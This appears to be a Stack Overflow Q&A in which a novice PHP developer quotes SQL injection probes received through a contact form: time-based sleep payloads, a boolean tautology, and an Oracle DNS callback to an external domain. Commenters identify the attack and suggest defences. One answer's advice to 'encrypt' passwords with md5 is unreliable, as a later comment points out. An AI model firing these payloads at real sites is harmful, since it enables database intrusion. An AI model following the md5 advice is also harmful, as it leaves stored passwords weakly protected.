3

I'm a newbie in PHP development. I created a site using PHP, HTML & Css which has a contact us page. Since last couple of days someone from a particular country (I don't want to mention the country name) is creating support message and entering some unusual or suspicious messages.

The contact from has four fields such as Full Name, E-mail, Subject & Message. Someone is sending messages like

1st:
written as "Subject" & (select(0)from(select(sleep(6)))v)/*'+ 
(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

2nd:
-1' OR 2+582-582-1=0+0+0+1 or '0gX9xp3t'='

3rd:
1iY5zL4R'));select pg_sleep(3); --

4th:
1||UTL_INADDR.get_host_address('dns.'||'sqli.032682.7775.77.a4f00.1.bxss'||'.me')

And there are many, please anyone who is familiar with PHP or others tell me what is this going on. Also please share some security precautions which I should take to prevent any threats or hacking.

I have built my site using MYSQLi to prevent/minimize SQL injection threats.

Syed Naveed
  • 83
  • 1
  • 10
  • 6
    Someone is trying to hack your site via SQL injection. If you are using prepared statements for queries you have no worries. – Jay Blanchard Mar 20 '18 at 14:05
  • Yes I'm using prepared statements like for example $db->prepare, $db->param etc., The "$db" is my database connection variable. Everything is working fine and there is no harm until now, but I'm afraid. – Syed Naveed Mar 20 '18 at 14:08
  • @CD001 how did you guess that? – Syed Naveed Mar 20 '18 at 14:10
  • But I don't understand how one can insert upto 80 records in under 10 secs. My site is flooded with this number of support messages. – Syed Naveed Mar 20 '18 at 14:12
  • 4
    @user2945468 - it's a bot/script automatically spamming your form; pretty common form of attack. Might be worth looking at something like [Google Invisible reCAPTCHA](https://www.google.com/recaptcha/intro/invisible.html) – CD001 Mar 20 '18 at 14:14
  • Surely a script they are running. Check this video if you're not sure how this works: https://www.youtube.com/watch?v=ciNHn38EyRc – Jacob H Mar 20 '18 at 14:14
  • 1
    add some input validation and sanitization to your form inputs; that will limit the 'garbage'/'naughtiness' you are receiving – lovelace Mar 20 '18 at 14:16
  • Okay, I'm very thankful to you guys. God bless!!! – Syed Naveed Mar 20 '18 at 14:45

1 Answers1

0

Few methods you can take to make your form safe are:-

  1. Use htmlspecialchars() to prevent XSS attacks.
  2. Encrypt passwords and other personal information via md5() or other methods.
  3. Use POST method instead of GET for transferring confidential information.
  4. Do not transfer confidential data through URL.
  5. Use certain tools to prevent spambots attack.
  6. If possible, add recaptcha.

For more tips, kindly check out https://www.thoughtco.com/solutions-to-protect-web-forms-from-spam-3467469.

PS: I am also new to PHP, just sharing my thoughts! Trust it is helpful.

Mr. Programmer
  • 95
  • 1
  • 10
  • Apart from being largely irrelevant to the question, your second point is very badly wrong. MD5 is definitely not a suitable function for hashing passwords, and if you're using it anywhere, you should make replacing it a high priority. Instead, you should use password_hash to generate a strong, uniquely-salted hash, and then retrieve it and check with password_verify when the user tries to login. See https://php.net/password – IMSoP Jul 11 '21 at 08:30